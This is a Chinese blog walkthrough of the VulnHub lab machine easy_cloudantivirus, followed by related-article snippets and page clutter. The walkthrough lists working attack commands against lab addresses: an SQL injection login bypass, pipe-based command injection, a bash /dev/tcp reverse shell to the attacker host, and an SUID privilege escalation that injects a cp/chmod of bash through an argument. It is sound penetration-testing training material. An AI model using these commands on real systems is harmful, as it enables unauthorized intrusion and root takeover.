vulnhub:easy_cloudantivirus靶机

最新推荐文章于 2024-07-18 15:41:00 发布
最新推荐文章于 2024-07-18 15:41:00 发布
阅读量218 收藏 1
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/128895060
版权

kali:192.168.111.111

靶机:192.168.111.177

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.177

访问8080端口

在输入框填入双引号发现报错

漏洞利用

尝试万能密码

" or 1=1--+

配合管道符可以执行命令

ls | id

本地nc监听,反弹shell

nc -lvp 4444
id | bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

查找suid权限的文件

find / -user root -perm -u=s -exec ls -al {} \; 2> /dev/null

用户家目录存放该程序源码

同样配合管道符执行命令

/home/scanner/update_cloudav "-h | cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash"

到/tmp目录下执行bash,获得root权限

./bash -p

ctostm
关注
靶机无法获得IP地址, 该怎么办?
墨痕诉清风的博客
07-18 1671
靶机的作者通常更建议我们使用VirtualBox来运行靶机,而不是VMWare家的虚拟化产品。如果靶机启动后无法获得IP地址(扫描无法发现靶机IP),请首先使用虚拟机的重启功能(Host+R)重新启动靶机,并在重启的黑屏阶段。在学习过程中,也有部分同学遇到了一个有些共性的问题,那就是靶机启动后无法自动获得IP地址。点击键盘中字母“e”,找到内核加载的配置行,如下图所示,将其修改为单用户启动模式。将配置文件中的网卡名称修改为当前的正确名称,并确定DHCP配置启动。保存配置修改,重启计算机正常进入系统!...
VulnHub打靶记录——easy_cloudantivirus
未完成的歌~的博客
06-29 585
靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/将靶机设置为NAT模式并启动。
VulnHub靶机-easy_cloudantivirus 打靶
rumil的博客
04-12 869
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
打靶记录2——靶机easy_cloudantivirus
Fab1an的博客
07-18 609
针对靶机,首先做了主机发现,当发现了它的目标IP地址之后对它进行端口扫描和服务版本的发现,进而发现了一个HTTP的服务,工作在目标靶机的8080端口上于是我们通过浏览器访问目标靶机8080端口上的Web服务于是在这个Web页面上,我们发现了一个SQL注入漏洞,也可以使用暴力破解的方式去破解它的邀请码,进而去登录到Web应用的后台页面在后台发现命令注入漏洞,利用命令注入漏洞获得反弹的Shell然后在目标靶机上进行信息收集。
打靶笔记--easys_cloudantivirus
2301_77315080的博客
04-22 645
打靶笔记--easys_cloudantivirus
VulnHub靶机-easy_cloudantivirus | 红队打靶02
qq_47289634的博客
07-20 282
靶机地址:攻击机kali IP:192.168.56.102这里是用的netdiscover+nmap 使用nmap对目标主机进行信息收集,看到开放了22,8080端口,分别运行了ssh和http服务 访问一下8080端口,发现是一个病毒防护的网站,需要输入邀请码 看到框就试试看有没有SQL注入,抓包,发送到burp中的测试模块爆破一下 看到有些响应长度很大的明显不一样,复制pyload,在网页打开看一下 直接看到了sql语句,根据sql语句构造闭合,在配合万能密码登录到后台, ,这里我们输入
[vulnerhub] easy_cloudav write up
CN_DS的博客
08-14 562
摘要 0x1 靶机:192.168.88.13(靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova) 攻击机:192.168.88.8 每周六都会跟着苑老师学习一片打靶课程, 然后做一篇writeup。废话不多说,开干!! 我的靶机安装在virtualbox上,攻击机使用的是kali,安装在vwmare上。使用的是桥接。链接到手动创建的...
easys_cloudantivirus
m0_72733529的博客
07-14 798
靶机地址:BoredHackerBlog: Cloud AV ~ VulnHub靶 机 ip:192.168.0.156ka li ip:192.168.0.102内容简介:这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:端口扫描WEB侦查SQL注入命令注入密码爆破代码审计NC串联本地提权 nmap -p- 192.168.0.156 全端口扫描 nmap -p
熊猫云计算杀毒软件-CloudAntivirus
12-30
一款超好的免费杀毒软件,是最新的云计算的应用。客户端无需耗费多少内存和CPU,服务器承担计算过程。
最新EXCEL宏病毒 杀毒软件
12-19
然而,通过使用指定的杀毒软件(即CloudAntivirus_94662.exe)可以有效查杀并防护这种病毒,而且这款软件不仅针对宏病毒,还能处理其他类型的恶意软件。 知识点详解: 1. **宏病毒**:宏病毒是一种特洛伊木马,它...
kali之vulhub,easycloudantivirus
weixin_54431413的博客
05-07 450
一、靶机描述 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录网址 六、利用远程命令执行漏洞与kali建立连接 七、提权 八、利用suid提取
(一)easy_cloudantivirus靶机渗透练习
qq_69746732的博客
01-04 1025
easy_cloudantivirus靶机渗透练习
Vulnhub-easy_cloudantivirus
weixin_46107179的博客
04-01 2849
靶机下载地址:靶机下载 主机发现 通过搭建的靶机环境,可以直接通过arp-scan -l 或者arping来发现主机,得到IP地址后进行信息搜集 信息搜集 通过nmap扫描得到靶机开放了22、8080端口,并且web服务是Werkzeug httpd 0.14.1 (Python 2.7.15rc1) 既然是web服务,通过浏览器打开看到说需要邀请码,可能是需要什么密码什么的 渗透攻击 这里可以有两种攻击手段,一种是SQL注入,可以使用" or 1=1 --+绕过,另外一种是暴力破解,我这里使用bur
easy_cloudantivirus靶机打靶过程及思路
qq_52610024的博客
04-04 2161
5.侦听4444端口通过连接获得shellnc10.0.2.44444-e/bin/bash-e的参数的作用是执行成功之后运行shell,发现。./update_cloudav“a|nc10.0.2.45555|/bin/bash|nc10.0.2.46666”进行suid。6.nc10.0.2.43333|/bin/bash|nc10.0.2.44444nc串联攻击。2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过。...
vulnhub-easy_cloudantivirus
qq_41810304的博客
06-01 642
前言: 做这个靶机隔了很长时间,因为在搞毕业设计以及找工作,现在只能说论文告一段落,只剩答辩和ppt了,就接着把这个做完,下载地址也不想找了,总体而言该靶机比较简单。最后,求答辩老师放过我吧。 Kali:192.168.1.4 目标机:192.168.1.31 信息收集: 漏洞挖掘: 从信息来看,开放ssh和网站端口,并且该网站是Python写的。可以爆破22端口,一般来说还是从网站下手,在我看来爆破密码依然是最后手段。先访问8080端口。 一般这个界面没有思路的话就是看看页面源码有没
0x02-easy_cloudantivirus
rec09er的博客
04-12 1064
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova 通关目标:取得目标靶机的root权限 攻击机:kali(10.0.2.10) 目标靶机easy_cloudantivirus(10.0.2.13) 涉及攻击方法:  ● 主机发现  ● 端口扫描  ● 目录扫描  ● SQL注入
VulnHub实战篇五:Cloud AV靶机渗透记录
a1004070060的博客
04-18 1678
前言:Cloud AV是BoredHackerBlog在2020年3月29日发布在Vulnhub上的最新靶机,至今还热乎着(没有找到可参考的wp)。早在今年的4月初我就把它下载了下来,但是由于我忽略一些显而易见的线索而卡了很长时间,在这期间我完成了DC-1靶机的测试,同时更加深入地了解了SUID提权。在此基础上,今天晚上再次打开Colud AV,我找到了之前被忽略的关键点并完成了对该靶机的提权,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8461
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于ssm的二手车交易网站设计与实现.docx
最新发布
09-17
基于ssm的二手车交易网站设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值